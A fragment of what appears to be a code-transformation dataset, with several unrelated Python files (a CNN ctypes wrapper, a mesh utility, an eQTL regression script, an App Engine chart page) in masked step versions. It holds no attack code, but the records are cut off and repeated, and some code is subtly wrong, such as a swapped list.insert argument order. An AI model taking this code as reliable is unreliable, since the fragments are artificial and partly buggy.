"step-5": "import time,pickle\nfrom CNN_GPU.CNN_C_Wrapper import *\nfrom pathlib import Path\n\nFSIGMOIG = 0\nFTANH = 2\nFRELU = 4\n\nREQUEST_INPUT = 0\nREQUEST_GRAD_INPUT = 1\nREQUEST_OUTPUT = 2\nREQUEST_WEIGTH = 3\n\nclass CNN:\n def __init__(self, inputSize, hitLearn=.1, momentum=.9, weigthDecay=.5, multip=1.0):\n file = '%s/%s' % (DIR_LIBRARY, 'gpu_function.cl')\n file = file.encode('utf-8')\n self.cnn = c_Pointer()\n clib.createCnnWrapper(c.addressof(self.cnn), c.create_string_buffer(file),\n hitLearn, momentum, weigthDecay, multip, inputSize[0], inputSize[1], inputSize[2])\n clib.initRandom(time.time_ns())\n\n def __del__(self):\n clib.releaseCnnWrapper(c.addressof(self.cnn))\n print('end')\n\n def addConvLayer(self, passo, tamanhoFitro, numeroFiltro):\n clib.CnnAddConvLayer(self.cnn.p, passo, tamanhoFitro, numeroFiltro)\n\n def addPoolLayer(self, passo, tamanhoFitro):\n clib.CnnAddPoolLayer(self.cnn.p, passo, tamanhoFitro)\n\n def addReluLayer(self):\n clib.CnnAddReluLayer(self.cnn.p)\n\n def addDropOutLayer(self, pontoAtivacao, seed):\n clib.CnnAddDropOutLayer(self.cnn.p, pontoAtivacao, seed)\n\n def addFullConnectLayer(self, saida, funcaoAtivacao):\n clib.CnnAddFullConnectLayer(self.cnn.p, saida, funcaoAtivacao)\n\n def predict(self, input):\n tinput = self.createInp(*input)\n clib.CnnCall(self.cnn.p, tinput)\n\n def learn(self, target):\n ttarg = self.targ(*target)\n clib.CnnLearn(self.cnn.p, ttarg)\n\n def getData(self, layer, request, nfilter=0):\n size = self.getSizeData(layer, request)\n if size is None: return None\n data = c.c_double * (size[0] * size[1] * size[2])\n data = data(0)\n err = clib.CnnGetTensorData(self.cnn.p, layer, request, nfilter, data)\n if err < 0:\n self.lastERROR = err\n return None\n return list(data)\n\n def getSizeData(self, layer, request):\n inx, iny, inz, n = c.c_int(0), c.c_int(0), c.c_int(0), c.c_int(0)\n err = clib.CnnGetSize(self.cnn.p, layer, request, c.addressof(inx), c.addressof(iny), c.addressof(inz),\n c.addressof(n))\n if err < 0:\n self.lastERROR = err\n return None\n return inx.value, iny.value, inz.value, n.value\n\n @property\n def output(self):\n err = clib.CnnGetTensorData(self.cnn.p, -1, REQUEST_OUTPUT, 0, self.out)\n if err < 0:\n self.lastERROR = err\n return None\n return list(self.out)\n\n def compile(self):\n if self.error: raise Exception(\"ERROR\")\n inx, iny, inz = c.c_int(0), c.c_int(0), c.c_int(0)\n err = clib.CnnGetSize(self.cnn.p, 0, REQUEST_INPUT, c.addressof(inx), c.addressof(iny), c.addressof(inz),\n c.cast(0, c.c_void_p))\n if err != 0: raise Exception('Error when request input size', err)\n self.createInp = c.c_double * (inx.value * iny.value * inz.value)\n err = clib.CnnGetSize(self.cnn.p, -1, REQUEST_OUTPUT, c.addressof(inx), c.addressof(iny), c.addressof(inz),\n c.cast(0, c.c_void_p))\n if err != 0: raise Exception('Error when request output size', err)\n self.out = c.c_double * (inx.value * iny.value * inz.value)\n self.targ = self.out\n self.out = self.out(0)\n\n def info(self):\n clib.CnnInfo(self.cnn.p)\n\n def save(self, fileName:str):\n filedesc = Path(fileName).with_suffix('.cdc')\n self.salveCnnDescriptor(filedesc)\n fileName = fileName.encode('utf-8')\n return clib.CnnSaveInFile(self.cnn.p, c.create_string_buffer(fileName))\n\n @staticmethod\n def load(fileName):\n self = CNN([2,2,1])\n fileName = fileName.encode('utf-8')\n clib.CnnLoadByFile(self.cnn.p, c.create_string_buffer(fileName))\n self.compile()\n return self\n @property\n def error(self):\n return clib.getCnnError(self.cnn.p)\n @property\n def errorMsg(self):\n buff = c.create_string_buffer(''.encode('utf-8'),255)\n clib.getCnnErrormsg(self.cnn.p,buff)\n return buff.value.decode('utf-8')\n def salveCnnDescriptor(self,file):\n desc_c = c_Pointer()\n clib.generateDescriptor(c.addressof(desc_c),self.cnn.p)\n msg = c.cast(desc_c.p,c.c_char_p)\n msg = msg.value.decode('utf-8')\n clib.freeP(desc_c.p)\n desc = eval(msg)\n with open(file,'wb') as f:\n pickle.dump(desc,f)\n # AUXILIAR FUNCTION\n def getOutputAsIndexMax(self):\n ans = clib.CnnGetIndexMax(self.cnn.p)\n return ans\n def normalizeVector(self,vector:list,maxOutput,minOutput):\n out_TYPE =c.c_double * len(vector)\n inp = out_TYPE(*vector)\n out = out_TYPE()\n clib.normalizeGPU(self.cnn.p,inp,out,len(vector),maxOutput,minOutput)\n return list(out)\n def normalizeVectorKnowedSpace(self,vector:list,maxInput,minInput,maxOutput,minOutput):\n out_TYPE =c.c_double * len(vector)\n tmp_inp = out_TYPE(*vector)\n tmp_out = out_TYPE(*vector)\n clib.normalizeGPUSpaceKnow(self.cnn.p,tmp_inp,tmp_out,len(vector),maxInput,minInput,maxOutput,minOutput)\n return list(tmp_out)\n def getOutPutAsPPM(self):\n p = c_Pointer()\n h = c.c_size_t()\n w = c.c_size_t()\n clib.Py_getCnnOutPutAsPPM(self.cnn.p, c.addressof(p), c.addressof(h), c.addressof(w))\n h = h.value\n w = w.value\n out = (c.c_ubyte*(w*h))()\n c.memmove(out,p.p,w*h)\n a = bytes(out)\n clib.freeP(p.p)\n return (h,w,a)",
"step-ids": [
7,
12,
20,
21,
27
]
}
|
[
7,
12,
20,
21,
27
] |
a = 1
b = 2
print(a + b)
print("hello")
list = [1, 2, 3, 4, 5]
for i in list:
if i % 2 != 0:
print(i)
print("branch")
|
normal
|
{
"blob_id": "03b325094bd3e77f467e17ce54deb95bf2b5c727",
"index": 1724,
"step-1": "<mask token>\n",
"step-2": "<mask token>\nprint(a + b)\nprint('hello')\n<mask token>\nfor i in list:\n if i % 2 != 0:\n print(i)\nprint('branch')\n",
"step-3": "a = 1\nb = 2\nprint(a + b)\nprint('hello')\nlist = [1, 2, 3, 4, 5]\nfor i in list:\n if i % 2 != 0:\n print(i)\nprint('branch')\n",
"step-4": "a = 1\nb = 2\nprint(a + b)\nprint(\"hello\")\n\nlist = [1, 2, 3, 4, 5]\n\nfor i in list:\n if i % 2 != 0:\n print(i)\nprint(\"branch\")",
"step-5": null,
"step-ids": [
0,
1,
2,
3
]
}
|
[
0,
1,
2,
3
] |
from __future__ import print_function
from __future__ import absolute_import
from __future__ import division
__all__ = [
'mesh_add_vertex_to_face_edge'
]
def mesh_add_vertex_to_face_edge(mesh, key, fkey, v):
"""Add an existing vertex of the mesh to an existing face.
Parameters
----------
mesh : compas.datastructures.Mesh
The mesh data structure.
key : hashable
The identifier of the vertex.
fkey : hashable
The identifier of the face.
v : hashable
The identifier of the vertex before which the new vertex should be added.
Notes
-----
The algorithm is merely there for convenience.
It does not check if the resulting mesh is still valid.
Examples
--------
Consider the following points and one face definition and the resulting mesh.
>>> points = [[0.0, 0.0, 0.0], [1.0, 0.0, 0.0], [1.0, 1.0, 0.0], [0.0, 1.0, 0.0], [0.5, 0.0, 0.0]]
>>> faces = [[0, 1, 2, 3]]
>>> mesh = Mesh.from_vertices_and_faces(points, faces)
>>> mesh.number_of_vertices()
5
>>> mesh.number_of_faces()
1
>>> mesh.face_degree(0)
4
>>> mesh.vertex_degree(4)
0
To add the isolated vertex to the single mesh face
>>> mesh_add_vertex_to_face_edge(mesh, 4, 0, 0, 1)
>>> mesh.face_degree(0)
5
>>> mesh.vertex_degree(4)
2
"""
vertices = mesh.face_vertices(fkey)
i = vertices.index(v)
u = vertices[i - 1]
vertices.insert(key, i - 1)
mesh.halfedge[u][key] = fkey
mesh.halfedge[key][v] = fkey
if u not in mesh.halfedge[key]:
mesh.halfedge[key][u] = None
if key not in mesh.halfedge[v]:
mesh.halfedge[v][key] = None
del mesh.halfedge[u][v]
if u in mesh.halfedge[v]:
del mesh.halfedge[v][u]
if (u, v) in mesh.edgedata:
del mesh.edgedata[u, v]
if (v, u) in mesh.edgedata:
del mesh.edgedata[v, u]
# ==============================================================================
# Main
# ==============================================================================
if __name__ == "__main__":
pass
|
normal
|
{
"blob_id": "d9b6efce92e30267a9f992c4fea698fe14e0c3e4",
"index": 1398,
"step-1": "<mask token>\n\n\ndef mesh_add_vertex_to_face_edge(mesh, key, fkey, v):\n \"\"\"Add an existing vertex of the mesh to an existing face.\n\n Parameters\n ----------\n mesh : compas.datastructures.Mesh\n The mesh data structure.\n key : hashable\n The identifier of the vertex.\n fkey : hashable\n The identifier of the face.\n v : hashable\n The identifier of the vertex before which the new vertex should be added.\n\n Notes\n -----\n The algorithm is merely there for convenience.\n It does not check if the resulting mesh is still valid.\n\n Examples\n --------\n Consider the following points and one face definition and the resulting mesh.\n\n >>> points = [[0.0, 0.0, 0.0], [1.0, 0.0, 0.0], [1.0, 1.0, 0.0], [0.0, 1.0, 0.0], [0.5, 0.0, 0.0]]\n >>> faces = [[0, 1, 2, 3]]\n >>> mesh = Mesh.from_vertices_and_faces(points, faces)\n >>> mesh.number_of_vertices()\n 5\n >>> mesh.number_of_faces()\n 1\n >>> mesh.face_degree(0)\n 4\n >>> mesh.vertex_degree(4)\n 0\n\n To add the isolated vertex to the single mesh face\n\n >>> mesh_add_vertex_to_face_edge(mesh, 4, 0, 0, 1)\n >>> mesh.face_degree(0)\n 5\n >>> mesh.vertex_degree(4)\n 2\n\n \"\"\"\n vertices = mesh.face_vertices(fkey)\n i = vertices.index(v)\n u = vertices[i - 1]\n vertices.insert(key, i - 1)\n mesh.halfedge[u][key] = fkey\n mesh.halfedge[key][v] = fkey\n if u not in mesh.halfedge[key]:\n mesh.halfedge[key][u] = None\n if key not in mesh.halfedge[v]:\n mesh.halfedge[v][key] = None\n del mesh.halfedge[u][v]\n if u in mesh.halfedge[v]:\n del mesh.halfedge[v][u]\n if (u, v) in mesh.edgedata:\n del mesh.edgedata[u, v]\n if (v, u) in mesh.edgedata:\n del mesh.edgedata[v, u]\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\ndef mesh_add_vertex_to_face_edge(mesh, key, fkey, v):\n \"\"\"Add an existing vertex of the mesh to an existing face.\n\n Parameters\n ----------\n mesh : compas.datastructures.Mesh\n The mesh data structure.\n key : hashable\n The identifier of the vertex.\n fkey : hashable\n The identifier of the face.\n v : hashable\n The identifier of the vertex before which the new vertex should be added.\n\n Notes\n -----\n The algorithm is merely there for convenience.\n It does not check if the resulting mesh is still valid.\n\n Examples\n --------\n Consider the following points and one face definition and the resulting mesh.\n\n >>> points = [[0.0, 0.0, 0.0], [1.0, 0.0, 0.0], [1.0, 1.0, 0.0], [0.0, 1.0, 0.0], [0.5, 0.0, 0.0]]\n >>> faces = [[0, 1, 2, 3]]\n >>> mesh = Mesh.from_vertices_and_faces(points, faces)\n >>> mesh.number_of_vertices()\n 5\n >>> mesh.number_of_faces()\n 1\n >>> mesh.face_degree(0)\n 4\n >>> mesh.vertex_degree(4)\n 0\n\n To add the isolated vertex to the single mesh face\n\n >>> mesh_add_vertex_to_face_edge(mesh, 4, 0, 0, 1)\n >>> mesh.face_degree(0)\n 5\n >>> mesh.vertex_degree(4)\n 2\n\n \"\"\"\n vertices = mesh.face_vertices(fkey)\n i = vertices.index(v)\n u = vertices[i - 1]\n vertices.insert(key, i - 1)\n mesh.halfedge[u][key] = fkey\n mesh.halfedge[key][v] = fkey\n if u not in mesh.halfedge[key]:\n mesh.halfedge[key][u] = None\n if key not in mesh.halfedge[v]:\n mesh.halfedge[v][key] = None\n del mesh.halfedge[u][v]\n if u in mesh.halfedge[v]:\n del mesh.halfedge[v][u]\n if (u, v) in mesh.edgedata:\n del mesh.edgedata[u, v]\n if (v, u) in mesh.edgedata:\n del mesh.edgedata[v, u]\n\n\nif __name__ == '__main__':\n pass\n",
"step-3": "<mask token>\n__all__ = ['mesh_add_vertex_to_face_edge']\n\n\ndef mesh_add_vertex_to_face_edge(mesh, key, fkey, v):\n \"\"\"Add an existing vertex of the mesh to an existing face.\n\n Parameters\n ----------\n mesh : compas.datastructures.Mesh\n The mesh data structure.\n key : hashable\n The identifier of the vertex.\n fkey : hashable\n The identifier of the face.\n v : hashable\n The identifier of the vertex before which the new vertex should be added.\n\n Notes\n -----\n The algorithm is merely there for convenience.\n It does not check if the resulting mesh is still valid.\n\n Examples\n --------\n Consider the following points and one face definition and the resulting mesh.\n\n >>> points = [[0.0, 0.0, 0.0], [1.0, 0.0, 0.0], [1.0, 1.0, 0.0], [0.0, 1.0, 0.0], [0.5, 0.0, 0.0]]\n >>> faces = [[0, 1, 2, 3]]\n >>> mesh = Mesh.from_vertices_and_faces(points, faces)\n >>> mesh.number_of_vertices()\n 5\n >>> mesh.number_of_faces()\n 1\n >>> mesh.face_degree(0)\n 4\n >>> mesh.vertex_degree(4)\n 0\n\n To add the isolated vertex to the single mesh face\n\n >>> mesh_add_vertex_to_face_edge(mesh, 4, 0, 0, 1)\n >>> mesh.face_degree(0)\n 5\n >>> mesh.vertex_degree(4)\n 2\n\n \"\"\"\n vertices = mesh.face_vertices(fkey)\n i = vertices.index(v)\n u = vertices[i - 1]\n vertices.insert(key, i - 1)\n mesh.halfedge[u][key] = fkey\n mesh.halfedge[key][v] = fkey\n if u not in mesh.halfedge[key]:\n mesh.halfedge[key][u] = None\n if key not in mesh.halfedge[v]:\n mesh.halfedge[v][key] = None\n del mesh.halfedge[u][v]\n if u in mesh.halfedge[v]:\n del mesh.halfedge[v][u]\n if (u, v) in mesh.edgedata:\n del mesh.edgedata[u, v]\n if (v, u) in mesh.edgedata:\n del mesh.edgedata[v, u]\n\n\nif __name__ == '__main__':\n pass\n",
"step-4": "from __future__ import print_function\nfrom __future__ import absolute_import\nfrom __future__ import division\n__all__ = ['mesh_add_vertex_to_face_edge']\n\n\ndef mesh_add_vertex_to_face_edge(mesh, key, fkey, v):\n \"\"\"Add an existing vertex of the mesh to an existing face.\n\n Parameters\n ----------\n mesh : compas.datastructures.Mesh\n The mesh data structure.\n key : hashable\n The identifier of the vertex.\n fkey : hashable\n The identifier of the face.\n v : hashable\n The identifier of the vertex before which the new vertex should be added.\n\n Notes\n -----\n The algorithm is merely there for convenience.\n It does not check if the resulting mesh is still valid.\n\n Examples\n --------\n Consider the following points and one face definition and the resulting mesh.\n\n >>> points = [[0.0, 0.0, 0.0], [1.0, 0.0, 0.0], [1.0, 1.0, 0.0], [0.0, 1.0, 0.0], [0.5, 0.0, 0.0]]\n >>> faces = [[0, 1, 2, 3]]\n >>> mesh = Mesh.from_vertices_and_faces(points, faces)\n >>> mesh.number_of_vertices()\n 5\n >>> mesh.number_of_faces()\n 1\n >>> mesh.face_degree(0)\n 4\n >>> mesh.vertex_degree(4)\n 0\n\n To add the isolated vertex to the single mesh face\n\n >>> mesh_add_vertex_to_face_edge(mesh, 4, 0, 0, 1)\n >>> mesh.face_degree(0)\n 5\n >>> mesh.vertex_degree(4)\n 2\n\n \"\"\"\n vertices = mesh.face_vertices(fkey)\n i = vertices.index(v)\n u = vertices[i - 1]\n vertices.insert(key, i - 1)\n mesh.halfedge[u][key] = fkey\n mesh.halfedge[key][v] = fkey\n if u not in mesh.halfedge[key]:\n mesh.halfedge[key][u] = None\n if key not in mesh.halfedge[v]:\n mesh.halfedge[v][key] = None\n del mesh.halfedge[u][v]\n if u in mesh.halfedge[v]:\n del mesh.halfedge[v][u]\n if (u, v) in mesh.edgedata:\n del mesh.edgedata[u, v]\n if (v, u) in mesh.edgedata:\n del mesh.edgedata[v, u]\n\n\nif __name__ == '__main__':\n pass\n",
"step-5": "from __future__ import print_function\nfrom __future__ import absolute_import\nfrom __future__ import division\n\n\n__all__ = [\n 'mesh_add_vertex_to_face_edge'\n]\n\n\ndef mesh_add_vertex_to_face_edge(mesh, key, fkey, v):\n \"\"\"Add an existing vertex of the mesh to an existing face.\n\n Parameters\n ----------\n mesh : compas.datastructures.Mesh\n The mesh data structure.\n key : hashable\n The identifier of the vertex.\n fkey : hashable\n The identifier of the face.\n v : hashable\n The identifier of the vertex before which the new vertex should be added.\n\n Notes\n -----\n The algorithm is merely there for convenience.\n It does not check if the resulting mesh is still valid.\n\n Examples\n --------\n Consider the following points and one face definition and the resulting mesh.\n\n >>> points = [[0.0, 0.0, 0.0], [1.0, 0.0, 0.0], [1.0, 1.0, 0.0], [0.0, 1.0, 0.0], [0.5, 0.0, 0.0]]\n >>> faces = [[0, 1, 2, 3]]\n >>> mesh = Mesh.from_vertices_and_faces(points, faces)\n >>> mesh.number_of_vertices()\n 5\n >>> mesh.number_of_faces()\n 1\n >>> mesh.face_degree(0)\n 4\n >>> mesh.vertex_degree(4)\n 0\n\n To add the isolated vertex to the single mesh face\n\n >>> mesh_add_vertex_to_face_edge(mesh, 4, 0, 0, 1)\n >>> mesh.face_degree(0)\n 5\n >>> mesh.vertex_degree(4)\n 2\n\n \"\"\"\n vertices = mesh.face_vertices(fkey)\n i = vertices.index(v)\n u = vertices[i - 1]\n vertices.insert(key, i - 1)\n mesh.halfedge[u][key] = fkey\n mesh.halfedge[key][v] = fkey\n if u not in mesh.halfedge[key]:\n mesh.halfedge[key][u] = None\n if key not in mesh.halfedge[v]:\n mesh.halfedge[v][key] = None\n del mesh.halfedge[u][v]\n if u in mesh.halfedge[v]:\n del mesh.halfedge[v][u]\n if (u, v) in mesh.edgedata:\n del mesh.edgedata[u, v]\n if (v, u) in mesh.edgedata:\n del mesh.edgedata[v, u]\n\n\n# ==============================================================================\n# Main\n# ==============================================================================\n\nif __name__ == \"__main__\":\n pass\n",
"step-ids": [
1,
2,
3,
4,
5
]
}
|
[
1,
2,
3,
4,
5
] |
from enum import Enum
class ImageTaggingChoice(str, Enum):
Disabled = "disabled",
Basic = "basic",
Enhanced = "enhanced",
UnknownFutureValue = "unknownFutureValue",
|
normal
|
{
"blob_id": "e3fe77867926d9d82963c8125048148de6998e2b",
"index": 4374,
"step-1": "<mask token>\n",
"step-2": "<mask token>\n\n\nclass ImageTaggingChoice(str, Enum):\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n",
"step-3": "<mask token>\n\n\nclass ImageTaggingChoice(str, Enum):\n Disabled = 'disabled',\n Basic = 'basic',\n Enhanced = 'enhanced',\n UnknownFutureValue = 'unknownFutureValue',\n",
"step-4": "from enum import Enum\n\n\nclass ImageTaggingChoice(str, Enum):\n Disabled = 'disabled',\n Basic = 'basic',\n Enhanced = 'enhanced',\n UnknownFutureValue = 'unknownFutureValue',\n",
"step-5": "from enum import Enum\n\nclass ImageTaggingChoice(str, Enum):\n Disabled = \"disabled\",\n Basic = \"basic\",\n Enhanced = \"enhanced\",\n UnknownFutureValue = \"unknownFutureValue\",\n\n",
"step-ids": [
0,
1,
2,
3,
4
]
}
|
[
0,
1,
2,
3,
4
] |
import pandas as pd
import subprocess
import statsmodels.api as sm
import numpy as np
import math
'''
This function prcesses the gene file
Output is a one-row file for a gene
Each individual is in a column
Input file must have rowname
gene: gene ENSG ID of interest
start_col: column number which the gene exp value starts
gene_col: column name for the gene column
gene_start_col: column name for the gene start position
chr_col: column name for the gene chromosome
'''
def process_input(gene_file, vcf_file, cov_file, gene, start_col, gene_col, chr_col, gene_start_col):
all_gene = pd.read_csv(gene_file, sep='[\t,]', header=0) #sep='[\t,]' allows read in both , and tab delimited files'''
gene=all_gene.loc[all_gene[gene_col]==gene,]
gene_start=int(gene.loc[:,gene_start_col])
chrom=int(gene.loc[:,chr_col])
gene=gene.iloc[:,start_col:gene.shape[1]]
start=int(gene_start-1e6)
if start < 0:start = 0
end=int(start+1e6)
cmd='tabix '+ vcf_file + ' ' + str(chrom) + ':' + str(start) + '-' + str(end)
s = subprocess.check_output(cmd, shell=True)
s = s.decode().strip()
s = s.split('\n')
gt=[]
for i in s:
gt.append(i.split('\t'))
s1=pd.DataFrame(gt)
info=s1.iloc[:,0:9]
s1=s1.drop([0,1,2,3,4,5,6,7,8],axis=1)
s1.index=info.iloc[:,2]
s2= pd.DataFrame()
for i in s1.columns:
s2[i] = s1[i].apply(lambda x: x.split(':')[1])
sample_ids = subprocess.check_output('/usr/local/bin/bcftools query -l {}'.format(vcf_file), shell=True).decode().strip().split()
s2.columns=sample_ids
s3=s2[gene.columns]
cov = pd.read_csv(cov_file, sep='\t', index_col=0, header=0)
cov=cov[gene.columns]
return gene, s3, cov
'''This function takes the input from the previous function
Fit linear model
Return beta and pvalues for the SNPs
'''
def lm_res(snps,gene,cov):
res = pd.DataFrame(np.zeros([snps.shape[0],2], dtype=np.float32))
res.index=snps.index
res.columns=['beta','pval']
for i in range(snps.shape[0]):
X=pd.concat([snps.iloc[i,].T, cov.T], axis=1)
X = X.apply(pd.to_numeric)
X = sm.add_constant(X)
est = sm.OLS(pd.to_numeric(gene.T.iloc[:,0]), X).fit()
res.iloc[i,0]=est.params[1]
res.iloc[i,1]=est.pvalues[1]
return res
|
normal
|
{
"blob_id": "2f64aac7032ac099870269659a84b8c7c38b2bf0",
"index": 8385,
"step-1": "<mask token>\n",
"step-2": "<mask token>\n\n\ndef lm_res(snps, gene, cov):\n res = pd.DataFrame(np.zeros([snps.shape[0], 2], dtype=np.float32))\n res.index = snps.index\n res.columns = ['beta', 'pval']\n for i in range(snps.shape[0]):\n X = pd.concat([snps.iloc[i,].T, cov.T], axis=1)\n X = X.apply(pd.to_numeric)\n X = sm.add_constant(X)\n est = sm.OLS(pd.to_numeric(gene.T.iloc[:, 0]), X).fit()\n res.iloc[i, 0] = est.params[1]\n res.iloc[i, 1] = est.pvalues[1]\n return res\n",
"step-3": "<mask token>\n\n\ndef process_input(gene_file, vcf_file, cov_file, gene, start_col, gene_col,\n chr_col, gene_start_col):\n all_gene = pd.read_csv(gene_file, sep='[\\t,]', header=0)\n gene = all_gene.loc[all_gene[gene_col] == gene,]\n gene_start = int(gene.loc[:, gene_start_col])\n chrom = int(gene.loc[:, chr_col])\n gene = gene.iloc[:, start_col:gene.shape[1]]\n start = int(gene_start - 1000000.0)\n if start < 0:\n start = 0\n end = int(start + 1000000.0)\n cmd = 'tabix ' + vcf_file + ' ' + str(chrom) + ':' + str(start\n ) + '-' + str(end)\n s = subprocess.check_output(cmd, shell=True)\n s = s.decode().strip()\n s = s.split('\\n')\n gt = []\n for i in s:\n gt.append(i.split('\\t'))\n s1 = pd.DataFrame(gt)\n info = s1.iloc[:, 0:9]\n s1 = s1.drop([0, 1, 2, 3, 4, 5, 6, 7, 8], axis=1)\n s1.index = info.iloc[:, 2]\n s2 = pd.DataFrame()\n for i in s1.columns:\n s2[i] = s1[i].apply(lambda x: x.split(':')[1])\n sample_ids = subprocess.check_output('/usr/local/bin/bcftools query -l {}'\n .format(vcf_file), shell=True).decode().strip().split()\n s2.columns = sample_ids\n s3 = s2[gene.columns]\n cov = pd.read_csv(cov_file, sep='\\t', index_col=0, header=0)\n cov = cov[gene.columns]\n return gene, s3, cov\n\n\n<mask token>\n\n\ndef lm_res(snps, gene, cov):\n res = pd.DataFrame(np.zeros([snps.shape[0], 2], dtype=np.float32))\n res.index = snps.index\n res.columns = ['beta', 'pval']\n for i in range(snps.shape[0]):\n X = pd.concat([snps.iloc[i,].T, cov.T], axis=1)\n X = X.apply(pd.to_numeric)\n X = sm.add_constant(X)\n est = sm.OLS(pd.to_numeric(gene.T.iloc[:, 0]), X).fit()\n res.iloc[i, 0] = est.params[1]\n res.iloc[i, 1] = est.pvalues[1]\n return res\n",
"step-4": "import pandas as pd\nimport subprocess\nimport statsmodels.api as sm\nimport numpy as np\nimport math\n<mask token>\n\n\ndef process_input(gene_file, vcf_file, cov_file, gene, start_col, gene_col,\n chr_col, gene_start_col):\n all_gene = pd.read_csv(gene_file, sep='[\\t,]', header=0)\n gene = all_gene.loc[all_gene[gene_col] == gene,]\n gene_start = int(gene.loc[:, gene_start_col])\n chrom = int(gene.loc[:, chr_col])\n gene = gene.iloc[:, start_col:gene.shape[1]]\n start = int(gene_start - 1000000.0)\n if start < 0:\n start = 0\n end = int(start + 1000000.0)\n cmd = 'tabix ' + vcf_file + ' ' + str(chrom) + ':' + str(start\n ) + '-' + str(end)\n s = subprocess.check_output(cmd, shell=True)\n s = s.decode().strip()\n s = s.split('\\n')\n gt = []\n for i in s:\n gt.append(i.split('\\t'))\n s1 = pd.DataFrame(gt)\n info = s1.iloc[:, 0:9]\n s1 = s1.drop([0, 1, 2, 3, 4, 5, 6, 7, 8], axis=1)\n s1.index = info.iloc[:, 2]\n s2 = pd.DataFrame()\n for i in s1.columns:\n s2[i] = s1[i].apply(lambda x: x.split(':')[1])\n sample_ids = subprocess.check_output('/usr/local/bin/bcftools query -l {}'\n .format(vcf_file), shell=True).decode().strip().split()\n s2.columns = sample_ids\n s3 = s2[gene.columns]\n cov = pd.read_csv(cov_file, sep='\\t', index_col=0, header=0)\n cov = cov[gene.columns]\n return gene, s3, cov\n\n\n<mask token>\n\n\ndef lm_res(snps, gene, cov):\n res = pd.DataFrame(np.zeros([snps.shape[0], 2], dtype=np.float32))\n res.index = snps.index\n res.columns = ['beta', 'pval']\n for i in range(snps.shape[0]):\n X = pd.concat([snps.iloc[i,].T, cov.T], axis=1)\n X = X.apply(pd.to_numeric)\n X = sm.add_constant(X)\n est = sm.OLS(pd.to_numeric(gene.T.iloc[:, 0]), X).fit()\n res.iloc[i, 0] = est.params[1]\n res.iloc[i, 1] = est.pvalues[1]\n return res\n",
"step-5": "import pandas as pd\nimport subprocess\nimport statsmodels.api as sm\nimport numpy as np\nimport math\n\n'''\nThis function prcesses the gene file\nOutput is a one-row file for a gene\nEach individual is in a column\n\nInput file must have rowname\ngene: gene ENSG ID of interest\nstart_col: column number which the gene exp value starts\ngene_col: column name for the gene column\ngene_start_col: column name for the gene start position\nchr_col: column name for the gene chromosome\n'''\ndef process_input(gene_file, vcf_file, cov_file, gene, start_col, gene_col, chr_col, gene_start_col):\n all_gene = pd.read_csv(gene_file, sep='[\\t,]', header=0) #sep='[\\t,]' allows read in both , and tab delimited files'''\n gene=all_gene.loc[all_gene[gene_col]==gene,]\n \n gene_start=int(gene.loc[:,gene_start_col])\n chrom=int(gene.loc[:,chr_col])\n gene=gene.iloc[:,start_col:gene.shape[1]]\n \n start=int(gene_start-1e6)\n if start < 0:start = 0\n end=int(start+1e6)\n\n cmd='tabix '+ vcf_file + ' ' + str(chrom) + ':' + str(start) + '-' + str(end)\n s = subprocess.check_output(cmd, shell=True)\n s = s.decode().strip()\n s = s.split('\\n')\n gt=[]\n for i in s:\n gt.append(i.split('\\t')) \n s1=pd.DataFrame(gt)\n info=s1.iloc[:,0:9]\n s1=s1.drop([0,1,2,3,4,5,6,7,8],axis=1)\n s1.index=info.iloc[:,2]\n\n s2= pd.DataFrame()\n for i in s1.columns:\n s2[i] = s1[i].apply(lambda x: x.split(':')[1])\n\n sample_ids = subprocess.check_output('/usr/local/bin/bcftools query -l {}'.format(vcf_file), shell=True).decode().strip().split()\n s2.columns=sample_ids\n s3=s2[gene.columns]\n\n cov = pd.read_csv(cov_file, sep='\\t', index_col=0, header=0) \n cov=cov[gene.columns]\n\n return gene, s3, cov\n\n'''This function takes the input from the previous function\n Fit linear model \n Return beta and pvalues for the SNPs\n'''\ndef lm_res(snps,gene,cov):\n res = pd.DataFrame(np.zeros([snps.shape[0],2], dtype=np.float32))\n res.index=snps.index\n res.columns=['beta','pval'] \n\n for i in range(snps.shape[0]):\n X=pd.concat([snps.iloc[i,].T, cov.T], axis=1)\n X = X.apply(pd.to_numeric)\n X = sm.add_constant(X)\n est = sm.OLS(pd.to_numeric(gene.T.iloc[:,0]), X).fit()\n res.iloc[i,0]=est.params[1]\n res.iloc[i,1]=est.pvalues[1] \n return res\n",
"step-ids": [
0,
1,
2,
3,
4
]
}
|
[
0,
1,
2,
3,
4
] |
import cgi
import os
import math
import sys
from datetime import datetime
sys.path.append(os.path.join(os.path.dirname(__file__), 'pygooglechart-0.2.1'))
from google.appengine.ext import webapp
from google.appengine.ext.webapp.util import run_wsgi_app
from pygooglechart import PieChart3D
from LPData import Totals
from LPData import T_Shirts
import render
def stacked_vertical():
total = Totals.get_or_insert('total')
if len(total.shirts) == 0:
shirts = sorted(T_Shirts, key= lambda shirt: shirt[0])
for shirt in shirts:
total.shirts.append(shirt[0])
total.votes.append(0)
votes = []
shirts = []
i = 0
while i < len(total.votes):
if total.votes[i] != 0:
votes.append(total.votes[i])
shirts.append('Design %s' % total.shirts[i])
i += 1
if len(votes) == 0:
return ''
chart = PieChart3D(650, 300)
chart.add_data(votes)
chart.set_pie_labels(shirts)
return chart.get_url()
class GraphPage(webapp.RequestHandler):
def get(self):
render.header(self)
render.body(self, 'graph.html', {'chart' : stacked_vertical()})
render.footer(self)
application = webapp.WSGIApplication([('/graph', GraphPage)], debug=True)
def main():
run_wsgi_app(application)
if __name__ == "__main__":
main()
|
normal
|
{
"blob_id": "d8c9e1098dde9d61341ebc3c55eada5592f4b71a",
"index": 2891,
"step-1": "<mask token>\n\n\ndef stacked_vertical():\n total = Totals.get_or_insert('total')\n if len(total.shirts) == 0:\n shirts = sorted(T_Shirts, key=lambda shirt: shirt[0])\n for shirt in shirts:\n total.shirts.append(shirt[0])\n total.votes.append(0)\n votes = []\n shirts = []\n i = 0\n while i < len(total.votes):\n if total.votes[i] != 0:\n votes.append(total.votes[i])\n shirts.append('Design %s' % total.shirts[i])\n i += 1\n if len(votes) == 0:\n return ''\n chart = PieChart3D(650, 300)\n chart.add_data(votes)\n chart.set_pie_labels(shirts)\n return chart.get_url()\n\n\nclass GraphPage(webapp.RequestHandler):\n\n def get(self):\n render.header(self)\n render.body(self, 'graph.html', {'chart': stacked_vertical()})\n render.footer(self)\n\n\n<mask token>\n\n\ndef main():\n run_wsgi_app(application)\n\n\n<mask token>\n",
